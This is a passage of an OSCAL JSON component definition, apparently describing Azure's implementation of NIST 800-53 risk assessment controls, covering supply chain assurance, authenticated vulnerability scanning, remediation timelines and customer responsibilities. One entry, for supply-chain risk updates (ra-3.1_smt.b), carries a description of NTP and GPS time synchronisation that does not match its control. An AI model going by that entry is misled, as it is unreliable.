Changes are coordinated with the Azure authorizing officials and an updated package submitted for review and consideration."}],"responsibilities":[{"uuid":"af623a3a-33cc-4c58-977b-932a2762a9a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-014"}],"description":"The customer is responsible for updating the risk assessment at the customer-defined frequency, when there are significant changes to customer-deployed resources (including the identification of new threats and vulnerabilities), or other conditions that may impact the security state of the system.","provided-uuid":"7a494808-bb0d-43eb-8c3f-79034252eebf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5114b4f6-65cb-4fb8-9446-68022c051d62","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-3.1","statements":[{"uuid":"6018a1c5-2871-48a1-b197-f8c4aa654ae9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3.1_smt.a","by-components":[{"uuid":"420e47a6-4c53-40a0-96a3-a97797bf7628","export":{"provided":[{"uuid":"d0c57281-3ba4-4c42-88bb-0c22ffa24a94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-015"}],"description":"Azure: \"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. 
The following efforts take place for Azure to assess and review the supply chain-related risks associated with Azure cloud components on an at least annual cadence. Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. 
Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. 
In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). 
In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"cf5f53ea-0cab-4beb-802d-58fcdbc55abe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-015"}],"description":"The customer is responsible for assessing supply chain risks associated with customer-defined and controlled systems, system components, and system services.","provided-uuid":"d0c57281-3ba4-4c42-88bb-0c22ffa24a94"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2e81bf35-090e-48ee-a0d8-a3236486f141","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3.1_smt.b","by-components":[{"uuid":"02172944-3fd1-47e4-b070-da044955b43f","export":{"provided":[{"uuid":"77246db4-e125-4c7f-9d95-53cfaf932417","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-016"}],"description":"Azure manages two different NTP time servers in separate geographic locations. The time servers are geographically dispersed and located in multiple separate Azure-managed datacenters. Azure chooses to use the GPS satellites as the authoritative time source as an alternative to the NIST time hosts. Azure synchronizes internal system clocks deployed on Azure assets to GPS satellites. 
All Azure assets synchronize the internal system clocks to the authoritative time sources at least every hour and update the time if it is off by one (1) millisecond or more."}],"responsibilities":[{"uuid":"9c5d5dbb-2c54-48ac-aa46-b6b26e575412","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-016"}],"description":"The customer is responsible for updating the supply chain risk assessment at a customer-defined frequency when there are significant changes to relevant supply chain, or when changes to the system, environments of operation, or other conditions may necessitate a change in the supply chain for customer-deployed resources.","provided-uuid":"77246db4-e125-4c7f-9d95-53cfaf932417"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"687a975a-6f66-4d52-858d-1f875fee6239","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5","statements":[{"uuid":"f9e7e680-55bc-45a2-8d16-70a960b00684","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.a","by-components":[{"uuid":"eb29ebd9-a55f-49e0-89ec-fdbf0d5fd484","export":{"provided":[{"uuid":"a49c346e-11ad-4255-aca6-67f26c140951","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-017"}],"description":"Azure implements vulnerability scanning by actively scanning servers, network devices, databases, and web applications in the Azure inventory with 
authenticated scans. All scans are performed monthly. The vulnerability scanning tools provide Azure updates as new vulnerabilities are identified and reported.\n\nScans are also performed when newly identified vulnerabilities are added for each type of scan. The C+AI VSA team within Azure manages the vulnerability management program and provides scanning services for the environment. C+AI VSA is responsible for the identification, assessment, and notification of vulnerabilities to Azure personnel, who are responsible for the remediation of verified vulnerabilities on operating systems, network elements and applications deployed in the Azure environment.\n\nListed below are the assets scanned each month in accordance with the monthly assignment:\n* Operating system (OS) Scans Conducted twice a day\n* Host, Guest, Native, and Pilotfish server environment\n* Physical server environment\n* Monthly operating system (OS) Scans\n* Azure network devices\n* Monthly database (DB) scans\n* SQL DB instances\n* Monthly web application scans\n* Web applications (hosted URLs)\n\nIn addition, the Third Party Assessment Organization (3PAO) satisfies the requirements for independent third-party security assessment and scanning on an annual basis. This is done by having the Third Party Assessment Organization (3PAO) review the scanning configuration, observe the scan where possible, and review the results."}],"responsibilities":[{"uuid":"b28fd1db-35ec-45c5-a081-aa4f884465eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-017"}],"description":"The customer is responsible for performing periodic vulnerability scanning on all customer-deployed resources, including applications built on those resources. Customers are responsible for running scans of their applications running within or connected to their purchased Microsoft Azure VMs or deployments. 
Detailed information regarding customer implementations of threat mitigating security practices can be accessed through the external Microsoft Azure Trust Center page located here: http://azure.microsoft.com/en-us/support/trust-center.","provided-uuid":"a49c346e-11ad-4255-aca6-67f26c140951"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fda7ee47-6f7d-4b9e-83ff-136e9474a7ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.b","by-components":[{"uuid":"b3743ed7-e297-42bc-9fa0-852074bd484d","export":{"provided":[{"uuid":"de7e13c3-1b09-41dc-ad62-b82a00e67078","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-018"}],"description":"Azure employs automated vulnerability scanning tools to scan the Azure operating systems, databases, and web applications. The vulnerability scanning tools provide reporting data based on a number of existing, well-used, open standards that itemize software flaws, security configurations, and various product names, including the Common Vulnerabilities and Exposures (CVE) and Common Vulnerability Scoring System (CVSS). The following sections address the scanning tools and techniques used for each applicable Azure asset type. Azure utilizes a variety of well-known knowledge-based scan tools with the applicable plugins to run authenticated vulnerability scans on a predetermined number of servers depending on the asset type. Scan tool plugins are updated prior to scanning any hosts. 
Azure employs the following predetermined scanning methodologies to perform authenticated scans:\n\n* Physical servers: 95% of Azure physical server operating systems are scanned with credentials using Qualys off-node, including database and web application hosts. All scans are authenticated.\n* Physical database instances: 95% of all physical databases are scanned with credentials using Qualys.\n* Virtual servers: Authenticated scans are performed on 95% of Azure service team servers. Azure scans virtual servers using the Microsoft-specific Qualys off-node scanner.\n* Virtual database instances: Azure uses a SKU-based sampling methodology for authenticated database instances. These scans are executed for database compliance checks. Azure databases are scanned with the VA Scan Tool.\n* Web applications: 95% of all Azure web applications have authenticated scans run against each URL. Scans of all web applications are performed using Rapid7 AppSpider with applicable web application plug-ins enabled. This is referred to as WebScout internally.\n
* Network devices: 85% of Azure network devices are scanned with authenticated scans using Qualys."}],"responsibilities":[{"uuid":"c1c2c163-abcd-4112-932c-19a8590f66c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-018"}],"description":"The customer is responsible for employing vulnerability scanning tools and techniques that facilitate interoperability among tools and automate parts of the vulnerability management process.","provided-uuid":"de7e13c3-1b09-41dc-ad62-b82a00e67078"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"683ecfc0-adf9-439b-8120-b85d99dc2aa9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.c","by-components":[{"uuid":"06b1a1d5-94cb-49db-95f1-f9c1b71333cb","export":{"provided":[{"uuid":"cc53b148-d65a-475e-ba66-da33a494fae4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-019"}],"description":"The Vulnerability Management team assesses the vulnerability severity and impact level based on documented technology deployed and used in the Azure environment.\n\nC+AI VSA collects information from a variety of vulnerability scanning tools to help determine the inventory of applications installed on servers and to assess the current threat surface. Configuration checks are performed against the C+AI VSA-managed Azure baselines. The C+AI Security team reviews configurations as part of the vulnerability scanning tool reports and performs a risk analysis in determining scores for impact and likelihood. 
Specific steps in the vulnerability process include:\n\n* Review mitigating controls that may affect the vulnerability rating, such as implementation of firewalls, antivirus software, access control lists (ACLs), and more.\n* Review the Asset Value for the affected assets.\n* Determine the timeframe for the application of the required updates."}],"responsibilities":[{"uuid":"ac35db98-964d-43e1-ac0d-c75f12d783d4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-019"}],"description":"The customer is responsible for analyzing scan reports and results from security control assessments.","provided-uuid":"cc53b148-d65a-475e-ba66-da33a494fae4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7a53f4f5-5d09-406c-b7f2-693e0c45b2b3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.d","by-components":[{"uuid":"8fc2b456-8a31-48c1-a1a7-a1d8a96a5c1e","export":{"provided":[{"uuid":"ca1aa060-790b-41ab-9ec9-fd2fbd830bea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-020"}],"description":"Vulnerabilities are classified by risk and applicability to the environment, with all vulnerabilities identified by C+AI VSA required to be remediated within thirty (30) days for high, ninety (90) days for moderate, and one hundred and eighty (180) days for low-risk vulnerabilities. 
In addition, all verified security flaws are managed and tracked via the POA&M process."}],"responsibilities":[{"uuid":"84e1111d-5087-45d0-93d6-18f1f5eb68b0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-020"}],"description":"The customer is responsible for remediating vulnerabilities in customer-deployed resources in accordance with the customer risk assessment.","provided-uuid":"ca1aa060-790b-41ab-9ec9-fd2fbd830bea"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"53a554f5-ed35-438f-94b5-cdefeeb7e82a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.e","by-components":[{"uuid":"a1d573cf-6a26-464d-bb64-28d9d6ca6236","export":{"provided":[{"uuid":"491f446f-f79d-4148-b6b9-a89b71fd6233","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-021"}],"description":"The C+AI Vulnerability Management team regularly communicates relevant information obtained during the scanning process with the appropriate Microsoft Online Services personnel to eliminate duplicate efforts and to facilitate the remediation process. Reporting of security vulnerabilities is conducted via the vulnerability management and reporting tool and focused e-mails. The vulnerability management and reporting tool provides reports based on multiple criteria, including property, server, and security flaws identified from the vulnerability scans, and is accessible by Azure personnel at any time. 
E-mail communication from the Vulnerability Management team is used to notify asset owners in cases of elevated risk or when expedited action is necessary.\n\nIn addition, Azure shares information obtained from the vulnerability scanning process and security control assessments with the ISSO/ISSM monthly via the Continuous Monitoring Reports and POA&M."}],"responsibilities":[{"uuid":"247da3d1-a21c-4811-a0b4-14c11d1c1396","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-021"}],"description":"The customer is responsible for sharing information obtained from the vulnerability scanning process and security control assessments to help eliminate similar vulnerabilities across customer-deployed resources.","provided-uuid":"491f446f-f79d-4148-b6b9-a89b71fd6233"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"38459d9b-759c-4122-be24-ea883a46f51d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.2","statements":[{"uuid":"58f3f884-e516-465c-9a03-7d987cd64cf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.2_smt","by-components":[{"uuid":"9045cb49-164e-4f8b-9d41-45589312a17c","export":{"provided":[{"uuid":"5573f2e1-cdc1-472c-b4d2-23ac25d45cc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-022"}],"description":"The vulnerability scanning tools used within the 
Azure environment include the capability to readily update the list of information system vulnerabilities to be scanned. The tools release new vulnerability definitions as needed following the publication of Common Vulnerabilities and Exposures (CVE) information. New signature files are updated either before each scan or, for Qualys off-node scan signatures, at least weekly, with scans performed daily."}],"responsibilities":[{"uuid":"cb89553d-b2cf-4301-91cb-985823bea746","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-022"}],"description":"The customer is responsible for updating the list of vulnerabilities scanned prior to a new scan, when new vulnerabilities are identified and reported, and/or at the customer-defined frequency.","provided-uuid":"5573f2e1-cdc1-472c-b4d2-23ac25d45cc1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c3d52ad9-59eb-4275-9d69-50f520096219","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.3","statements":[{"uuid":"a323fd0b-be98-456b-9c97-56ebb43f7724","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-023"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.3_smt","by-components":[{"uuid":"c6bb90e4-8298-4dd6-8b5f-98f957b20066","export":{"provided":[{"uuid":"86905d23-f9ed-42bb-81cf-d29a1021836d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-023
"}],"description":"To meet the appropriate breadth and depth of coverage, Azure utilizes vulnerability scanning tools to conduct authenticated scans of all asset types within the Azure security authorization boundary. Vulnerability scans of the Azure web applications and databases are conducted using vulnerability scanning tools with applicable web application and database plug-ins enabled. All scanning results are based on the latest plugins available to ensure all areas are covered in appropriate depth. In addition, for database instance scanning, appropriate tools are used to ensure database compliance checks are enabled."}],"responsibilities":[{"uuid":"67fd1564-d938-4814-a0dd-fbe5a9060a30","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-023"}],"description":"The customer is responsible for employing vulnerability scanning procedures that identify the breadth and depth of coverage.","provided-uuid":"86905d23-f9ed-42bb-81cf-d29a1021836d"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8b930363-0945-4c89-a69c-2b9b9e55ba2a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.4","statements":[{"uuid":"5e027f3d-d237-478b-84a7-85d3af0e16ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.4_smt","by-components":[{"uuid":"7347f704-fa8f-454e-9356-4b251de1ac4c","export":{"provided":[{"uuid":"32e68548-39a1-4e24-90fb-55ea1a08ecf5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-024"}],"description":"Microsoft's Marketing Communications team conducts weekly scans on search engines and media web sites such as Bing, Google, Twitter, and Facebook using keywords like Microsoft, Microsoft Datacenter, competitor names, product names, and more to identify any disclosed nonpublic information. 
Additionally, all publicly available white papers are updated and reviewed by the Marketing Communications team on a quarterly basis.\n\nIf any nonpublic information is identified as part of these reviews, the Azure incident management process is followed to investigate and remediate the issue."}],"responsibilities":[{"uuid":"da4b6cda-c2eb-4f7d-9fe1-b0ba4feb413c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-024"}],"description":"The customer is responsible for taking action in response to customer information that is discoverable by adversaries.","provided-uuid":"32e68548-39a1-4e24-90fb-55ea1a08ecf5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ebe3a096-2494-4169-b0cb-5869a157279d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.5","statements":[{"uuid":"1ca1b498-d2e9-4938-8f49-f2281313aa72","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.5_smt","by-components":[{"uuid":"c1a113fe-5558-4c2f-8c74-a46b3ebb4fc0","export":{"provided":[{"uuid":"170a2208-9ff7-4f2b-9887-42082aad1003","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-025"}],"description":"Azure includes elevated access authorization to operating systems, databases, and web applications for authenticated vulnerability scanning to facilitate more thorough scanning. 
Azure utilizes vulnerability scanning tools to conduct authenticated scans of the devices within the Azure security authorization boundary. Vulnerability scans are conducted using vulnerability scanning tools with applicable web application and database plug-ins enabled, or specialized tools where appropriate."}],"responsibilities":[{"uuid":"8fca46be-359f-47c2-899f-783cfbc53f47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-025"}],"description":"The customer is responsible for implementing privileged access for executing customer-defined vulnerability scanning activities.","provided-uuid":"170a2208-9ff7-4f2b-9887-42082aad1003"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"02339b72-5d80-4288-9459-a780f1c2e575","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.8","statements":[{"uuid":"7b86f092-382e-43a5-9c6f-bd82219ec971","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.8_smt","by-components":[{"uuid":"da6c9374-9b5f-4b7b-9175-7e3fcc57e2be","export":{"provided":[{"uuid":"8b0b67c7-967d-4a47-ad51-41c0bb4cc94d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-026"}],"description":"Azure implements audit review, analysis, and reporting through the use of Azure logging and monitoring tools for both server baselines and network devices. 
The automated tooling processes logs for anomalous activity and sends alerts and incident tickets as needed.\n\nAdditionally, to identify vulnerabilities, Azure conducts scans of operating systems, databases, and web applications in the Azure environment. Multiple sources of information for vulnerability-related data are used for these scans, including MSRC, vendor websites, and other third-party websites. The Security Response Team reviews historic log data as needed for incident investigation."}],"responsibilities":[{"uuid":"c57a3e49-4908-475b-ab95-2e986d348d84","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-026"}],"description":"The customer is responsible for reviewing historic audit logs to determine if a vulnerability identified within customer-deployed resources has been previously exploited.","provided-uuid":"8b0b67c7-967d-4a47-ad51-41c0bb4cc94d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7786d732-feab-4642-a72e-575f08f7baf3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.11","statements":[{"uuid":"feaf7420-5e92-42d8-9e44-edfed61b2d37","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.11_smt","by-components":[{"uuid":"d978921a-03e4-4bd4-be4f-7fcb573d3b3d","export":{"provided":[{"uuid":"f03a134b-b9d5-42b8-a950-3b519383fd4f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","
name":"acf-id","value":"RA-14-027"}],"description":"The Azure Continuous Monitoring and Azure Security teams establish public reporting channels for receiving reports of vulnerabilities. The Azure Security Team maintains websites that external customers can use to report vulnerabilities. The Azure Continuous Monitoring team members hold subscriptions to external sources that report vulnerabilities, such as the Cybersecurity and Infrastructure Security Agency (CISA), the Qualys KB, Qualys vulnerability scanning, MSRC internal Microsoft communications, NIST, and the NVD websites. Vulnerabilities obtained from external channels are assessed to determine whether they impact the Azure compliance boundary. If found to impact the Azure compliance boundary, the Azure Continuous Monitoring team tracks the vulnerabilities as open POA&Ms and coordinates with Azure Security and Service Teams to drive the vulnerabilities to closure."}],"responsibilities":[{"uuid":"d029752f-190e-491e-8897-99518b25c9fc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-027"}],"description":"The customer is responsible for establishing a public reporting channel for receiving reports of vulnerabilities in organizational systems and system components for customer-deployed resources.","provided-uuid":"f03a134b-b9d5-42b8-a950-3b519383fd4f"}]},"description":"See inheritance and customer responsibility 
